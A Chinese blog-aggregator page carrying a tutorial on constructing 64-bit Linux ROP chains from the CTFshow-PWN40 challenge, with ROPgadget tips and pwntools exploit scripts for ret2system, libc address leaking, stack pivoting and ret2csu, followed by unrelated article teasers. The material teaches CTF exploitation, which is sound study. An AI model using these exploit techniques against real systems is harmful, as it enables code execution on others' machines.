当前位置: 首页 > article >正文

从CTFshow-PWN40实战出发:深入理解64位Linux下的ROP攻击链构建(含工具使用技巧)

article 2026/4/30 4:47:50
64位Linux下ROP攻击链构建的艺术从CTFshow-PWN40到实战进阶在CTF竞赛和二进制安全研究领域ROPReturn-Oriented Programming技术一直是绕过现代防护机制如NX/DEP的利器。不同于32位环境下相对简单的栈溢出利用64位系统引入了全新的调用约定和寄存器传参机制这为ROP链的构建带来了全新的挑战与可能性。本文将以CTFshow-PWN40为切入点但绝不局限于单一题目解答而是深入探讨64位环境下ROP攻击的通用构建方法论。1. 64位与32位调用约定的本质差异理解64位Linux的调用约定是构建有效ROP链的前提。与32位系统将参数全部压栈不同64位系统采用了System V AMD64 ABI调用约定前六个参数依次通过RDI、RSI、RDX、RCX、R8、R9传递第七个及以上参数从右向左压栈浮点参数使用XMM0-XMM7寄存器返回值仍通过RAX传递这种差异直接影响了ROP链的构建逻辑。在32位系统中我们只需将参数和返回地址依次压栈即可调用函数。但在64位环境下必须先设置寄存器再触发函数调用。以system(/bin/sh)为例# 32位调用方式 payload padding p32(system_addr) p32(0) p32(bin_sh_addr) # 64位调用方式 payload padding p64(pop_rdi) p64(bin_sh_addr) p64(system_addr)关键区别在于需要先通过gadget设置RDI寄存器而非直接将参数压栈。这种变化使得64位ROP链通常需要更多精心挑选的gadget。注意某些情况下需要在system调用前插入ret gadget来解决栈对齐问题这是64位环境特有的考虑因素。2. ROPgadget工具的高级实战技巧寻找合适的gadget是ROP攻击的核心环节。ROPgadget是最常用的工具之一但大多数人仅使用其基础功能。以下是专业选手常用的高阶技巧2.1 精准过滤与组合搜索# 基本用法查找所有gadget ROPgadget --binary vulnerable # 高级过滤只显示包含特定指令组合的gadget ROPgadget --binary vulnerable --only pop|ret | grep rdi常用过滤组合需求场景推荐命令组合设置RDI寄存器--only pop寻找栈迁移gadget--only mov构造内存写入原语--only mov寻找syscall指令--only syscall2.2 处理大型二进制文件面对大型程序如完整的libc.so直接扫描可能非常耗时。可以结合函数边界分析提高效率# 只扫描.text段 ROPgadget --binary libc.so.6 --range 0x7ffff7a00000-0x7ffff7b00000 # 针对特定函数内的gadget ROPgadget --binary libc.so.6 --range $(readelf -s libc.so.6 | grep system | awk {print $2})-$(readelf -s libc.so.6 | grep system | awk {print $3})2.3 自动化gadget链构建结合pwntools可以实现半自动化的gadget搜索from pwn import * context.binary vulnerable elf ELF(vulnerable) def find_gadget(*instructions): rop ROP(elf) for ins in instructions: try: gadget rop.find_gadget(ins.split()) return gadget.address except: continue return None pop_rdi find_gadget(pop rdi, pop rdi ret)3. 通用ROP链构建方法论一个完整的ROP攻击链通常包含以下几个逻辑部分寄存器控制阶段设置函数调用所需的寄存器值函数调用阶段触发目标函数执行栈平衡处理解决调用约定和栈对齐问题后续控制流维持控制或执行多个连续调用3.1 基础ROP链构造以CTFshow-PWN40为例其ROP链构造逻辑如下[填充字节][pop rdi; ret][/bin/sh地址][ret gadget][system地址]对应的Python实现from pwn import * context.arch amd64 p process(./vulnerable) pop_rdi 0x4007e3 bin_sh 0x400808 ret 0x4004fe system 0x400520 payload flat( bA*(0xA8), pop_rdi, bin_sh, ret, system ) p.sendline(payload) p.interactive()3.2 复杂场景下的ROP链设计当目标环境中没有现成的system和/bin/sh时我们需要更复杂的构造泄漏libc地址通过puts/printf泄漏GOT表项计算libc基址根据偏移计算system和/bin/sh的实际地址二次攻击构造新的ROP链调用system典型攻击流程[泄漏GOT的ROP链] - [接收泄漏值] - [计算地址] - [最终攻击ROP链]实现代码框架# 第一阶段泄漏libc地址 leak_payload flat([ pop_rdi, elf.got[puts], elf.plt[puts], elf.sym[main] # 返回main函数进行二次攻击 ]) # 接收泄漏值并计算 leaked_puts u64(p.recv(6).ljust(8, b\x00)) libc.address leaked_puts - libc.sym[puts] # 第二阶段调用system bin_sh next(libc.search(b/bin/sh)) system_addr libc.sym[system] final_payload flat([ bA*offset, pop_rdi, bin_sh, ret, system_addr ])4. 高级技巧与实战经验分享4.1 栈迁移技术当溢出空间不足时可以使用栈迁移技术# 寻找leave; ret gadget leave_ret 0x400845 # 将栈迁移到可控区域 payload flat([ bA*offset, pop_rdi, new_stack_addr, leave_ret ])4.2 通用gadget的利用某些程序中存在特别有用的通用gadget如__libc_csu_init中的pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret可以用于设置多个寄存器极大增强ROP链的灵活性。4.3 对抗现代防护机制针对ASLR、PIE等防护的应对策略信息泄漏通过格式化字符串或UAF泄漏地址partial overwrite在PIE启用时利用地址低位不变性GOT劫持修改GOT表项控制执行流实际漏洞利用往往需要结合多种技术。在一次真实场景中我通过组合使用堆溢出和ROP技术最终实现了在Full RELROASLRPIE保护下的远程代码执行。关键点在于利用堆漏洞修改stdout结构体泄漏libc地址通过堆风水控制特定内存区域构造ROP链时特别注意栈对齐问题使用ret2csu技术设置多个寄存器参数

相关文章:

从CTFshow-PWN40实战出发:深入理解64位Linux下的ROP攻击链构建(含工具使用技巧)

64位Linux下ROP攻击链构建的艺术:从CTFshow-PWN40到实战进阶 在CTF竞赛和二进制安全研究领域,ROP(Return-Oriented Programming)技术一直是绕过现代防护机制(如NX/DEP)的利器。不同于32位环境下相对简单的栈…...

编程日记 2026/4/30 4:47:50

VolumetricLights社区贡献指南:参与开源项目的最佳实践

VolumetricLights社区贡献指南:参与开源项目的最佳实践 【免费下载链接】VolumetricLights Volumetric Lights for Unity 项目地址: https://gitcode.com/gh_mirrors/vo/VolumetricLights VolumetricLights是一款为Unity引擎开发的开源体积光效果扩展&#x…...

编程日记 2026/4/30 4:47:50

保姆级教程:用UPF搞定芯片低功耗设计,从电源域划分到状态表实战

芯片低功耗设计实战:从UPF入门到电源状态表精解 低功耗设计已成为现代芯片开发的核心竞争力之一。想象一下,你刚接手一个需要支持动态电压调节和电源关断的处理器子系统设计,面对EDA工具里密密麻麻的电源网络和状态控制需求,是否感…...

编程日记 2026/4/30 4:47:50

AI伦理与治理:一个被忽视却至关重要的职业发展方向

在人工智能(AI)技术飞速发展的今天,AI系统已渗透到金融、医疗、交通等各个领域,带来效率革命的同时也引发深刻伦理挑战。偏见算法导致歧视性决策、数据滥用侵犯隐私、自主系统失控酿成事故——这些问题凸显了AI伦理与治理的紧迫性…...

编程日记 2026/4/30 4:45:50

GodSVG元素属性系统详解:掌握每个SVG标签的完整配置

GodSVG元素属性系统详解:掌握每个SVG标签的完整配置 【免费下载链接】GodSVG A vector graphics application for structured SVG editing, available on all major desktop platforms and on web. Currently in late alpha. 项目地址: https://gitcode.com/gh_mi…...

编程日记 2026/4/30 4:45:50

零信任时代的数据合规终极指南:Electric SQL实现GDPR与本地化同步的完整解决方案

零信任时代的数据合规终极指南:Electric SQL实现GDPR与本地化同步的完整解决方案 【免费下载链接】electric Read-path sync engine for Postgres that handles partial replication, data delivery and fan-out. 项目地址: https://gitcode.com/GitHub_Trending/…...

编程日记 2026/4/30 4:45:50

MoltGrid:基于3D网格与深度学习的分子性质预测框架实战指南

1. 项目概述:当分子动力学遇上机器学习最近在分子模拟和药物发现社区里,一个名为 MoltGrid 的项目引起了我的注意。这个由 D0NMEGA 团队开源的框架,本质上是在解决一个困扰计算化学领域多年的老问题:如何高效、准确地预测分子在特…...

编程日记 2026/4/30 4:45:49

invoice2data 高级技巧:使用插件系统解析复杂表格和行项目

invoice2data 高级技巧:使用插件系统解析复杂表格和行项目 【免费下载链接】invoice2data Extract structured data from PDF invoices 项目地址: https://gitcode.com/gh_mirrors/in/invoice2data invoice2data 是一款强大的开源工具,能够从 PDF…...

编程日记 2026/4/30 4:45:47

PTP协议精讲(3.12):单播协商实现——PTP的“专线服务“

3.12 单播协商实现:PTP的"专线服务" 为什么需要单播 默认PTP使用组播,但有些场景需要单播: 组播的局限性:1. 跨网段问题- 组播可能被路由器阻止- TTL限制传播范围- 需要组播路由支持2. 网络负载- 所有设备都收到所有…...

编程日记 2026/4/30 4:43:46

SMHasher问题排查:常见错误及其解决方案

SMHasher问题排查:常见错误及其解决方案 【免费下载链接】smhasher Hash function quality and speed tests 项目地址: https://gitcode.com/gh_mirrors/smha/smhasher SMHasher是一款用于测试哈希函数质量和速度的开源工具,广泛应用于哈希算法的…...

编程日记 2026/4/30 4:43:46

机器学习赋能软件质量保障:从Bug自动分类到智能缺陷管理实战

1. 项目概述:当机器学习遇见软件质量保障在软件开发的日常里,Bug(缺陷)的识别、分类和处理,是每个工程师和测试人员绕不开的“日常任务”。想象一下,一个大型开源项目,每天有成百上千个新的Bug报…...

编程日记 2026/4/30 4:43:46

解锁QuickCut视频处理黑科技:从光流法补帧到视频倒放的完整指南

解锁QuickCut视频处理黑科技:从光流法补帧到视频倒放的完整指南 【免费下载链接】QuickCut Your most handy video processing software 项目地址: https://gitcode.com/gh_mirrors/qu/QuickCut QuickCut作为一款便捷的视频处理软件,不仅提供基础…...

编程日记 2026/4/30 4:43:44

DeepLake:AI数据管理的瑞士军刀,从原理到实战全解析

1. 项目概述:为什么说DeepLake是AI数据管理的“瑞士军刀”?如果你正在构建一个AI应用,无论是图像识别、自然语言处理还是多模态模型,数据管理绝对是你绕不开的“拦路虎”。数据格式五花八门,从图片、文本到视频、点云&…...

编程日记 2026/4/30 4:43:36

Docker GitHub Actions Runner 多环境部署:开发、测试与生产环境配置

Docker GitHub Actions Runner 多环境部署:开发、测试与生产环境配置 【免费下载链接】docker-github-actions-runner This will run the new self-hosted github actions runners with docker-in-docker 项目地址: https://gitcode.com/gh_mirrors/do/docker-git…...

编程日记 2026/4/30 4:41:34

如何为Runtime Mobile Security (RMS)扩展新功能并贡献到开源社区:完整指南

如何为Runtime Mobile Security (RMS)扩展新功能并贡献到开源社区:完整指南 【免费下载链接】RMS-Runtime-Mobile-Security Runtime Mobile Security (RMS) 📱🔥 - is a powerful web interface that helps you to manipulate Android and iO…...

编程日记 2026/4/30 4:41:33

终极PDF OCR工具指南:如何用OCRmyPDF快速实现文档扫描识别与智能PDF处理 [特殊字符]✨

终极PDF OCR工具指南:如何用OCRmyPDF快速实现文档扫描识别与智能PDF处理 📄✨ 【免费下载链接】OCRmyPDF OCRmyPDF adds an OCR text layer to scanned PDF files, allowing them to be searched 项目地址: https://gitcode.com/GitHub_Trending/oc/OC…...

编程日记 2026/4/30 4:41:30

终极指南:BinNavi与Ghidra全方位对比,哪款开源二进制分析工具更适合你?

终极指南:BinNavi与Ghidra全方位对比,哪款开源二进制分析工具更适合你? 【免费下载链接】binnavi BinNavi is a binary analysis IDE that allows to inspect, navigate, edit and annotate control flow graphs and call graphs of disassem…...

编程日记 2026/4/30 4:41:29

深度解析 ArcGIS Python API 栅格分析功能:遥感数据处理完全教程

深度解析 ArcGIS Python API 栅格分析功能:遥感数据处理完全教程 【免费下载链接】arcgis-python-api Documentation and samples for ArcGIS API for Python 项目地址: https://gitcode.com/gh_mirrors/ar/arcgis-python-api ArcGIS Python API 是一款功能强…...

编程日记 2026/4/30 4:41:18

10个必学的Laravel Artisan命令:提升开发效率的终极自动化工具

10个必学的Laravel Artisan命令:提升开发效率的终极自动化工具 【免费下载链接】framework Laravel is a web application framework with expressive, elegant syntax. 项目地址: https://gitcode.com/GitHub_Trending/fr/framework Laravel Artisan是Larav…...

编程日记 2026/4/30 4:39:17

Laravel并行测试:3倍速提升测试效率的终极实战指南

Laravel并行测试:3倍速提升测试效率的终极实战指南 【免费下载链接】framework Laravel is a web application framework with expressive, elegant syntax. 项目地址: https://gitcode.com/GitHub_Trending/fr/framework Laravel是一款拥有简洁优雅语法的We…...

编程日记 2026/4/30 4:39:17

Laravel断言库终极指南:掌握20+测试验证方法的实战技巧

Laravel断言库终极指南:掌握20测试验证方法的实战技巧 【免费下载链接】framework Laravel is a web application framework with expressive, elegant syntax. 项目地址: https://gitcode.com/GitHub_Trending/fr/framework Laravel是一款拥有简洁优雅语法的…...

编程日记 2026/4/30 4:39:17

终极指南:Laravel如何无缝连接PHP与JavaScript构建高效前后端交互

终极指南:Laravel如何无缝连接PHP与JavaScript构建高效前后端交互 【免费下载链接】framework Laravel is a web application framework with expressive, elegant syntax. 项目地址: https://gitcode.com/GitHub_Trending/fr/framework Laravel是一款拥有简…...

编程日记 2026/4/30 4:39:16

告别XSS攻击!Laravel HTML生成安全实战指南

告别XSS攻击!Laravel HTML生成安全实战指南 【免费下载链接】framework Laravel is a web application framework with expressive, elegant syntax. 项目地址: https://gitcode.com/GitHub_Trending/fr/framework Laravel是一款具有表达性、优雅语法的Web应…...

编程日记 2026/4/30 4:39:10

终极GStreamer安全指南:防范多媒体处理中的25个致命风险

终极GStreamer安全指南:防范多媒体处理中的25个致命风险 【免费下载链接】gstreamer GStreamer open-source multimedia framework 项目地址: https://gitcode.com/gh_mirrors/gs/gstreamer GStreamer作为开源多媒体框架,广泛应用于视频播放、直播…...

编程日记 2026/4/30 4:37:06

Vinix音频子系统解析:HDA驱动与OSS兼容层的实现原理

Vinix音频子系统解析:HDA驱动与OSS兼容层的实现原理 【免费下载链接】vinix Vinix is an effort to write a modern, fast, and useful operating system in the V programming language 项目地址: https://gitcode.com/gh_mirrors/vi/vinix Vinix是一个用V语…...

编程日记 2026/4/30 4:37:06

Lowdefy核心概念深度解析:Blocks、Operators、Actions和Requests的终极指南

Lowdefy核心概念深度解析:Blocks、Operators、Actions和Requests的终极指南 【免费下载链接】lowdefy Build apps that AI can generate, humans can review, and teams can maintain. Config that works between code and natural language. 项目地址: https://g…...

编程日记 2026/4/30 4:37:06

gltf-pipeline入门教程:5分钟学会glTF与glb格式转换

gltf-pipeline入门教程:5分钟学会glTF与glb格式转换 【免费下载链接】gltf-pipeline Content pipeline tools for optimizing glTF assets. :globe_with_meridians: 项目地址: https://gitcode.com/gh_mirrors/gl/gltf-pipeline glTF Pipeline是一款强大的内…...

编程日记 2026/4/30 4:37:06

Twake Drive开发环境搭建:从零开始的完整教程

Twake Drive开发环境搭建:从零开始的完整教程 【免费下载链接】twake-drive-legacy LEGACY: The open-source alternative to Google Drive. 项目地址: https://gitcode.com/gh_mirrors/tw/twake-drive-legacy Twake Drive是一款开源的Google Drive替代方案…...

编程日记 2026/4/30 4:37:06

卡内基梅隆大学研究团队告诉你,如何让AI代理既安全又好用

这项由卡内基梅隆大学软件工程研究团队主导的研究,发表于2026年的软件工程与人工智能交叉领域,论文编号为arXiv:2604.15579,有兴趣深入了解的读者可以通过该编号查询完整论文。设想你开了一家医院,雇了一位能力超群的新员工。这位…...

编程日记 2026/4/30 4:35:05

Fewshot Corp与卡内基梅隆发现:超15%AI测试题存在可被绕过漏洞

这项由Fewshot Corp与卡内基梅隆大学联合开展的研究,以预印本形式于2026年4月19日发布,论文编号为arXiv:2604.17596,研究团队来自两个机构,分别是专注于少样本学习应用的Fewshot Corp,以及在AI安全领域具有重要影响力的…...

编程日记 2026/4/30 4:35:05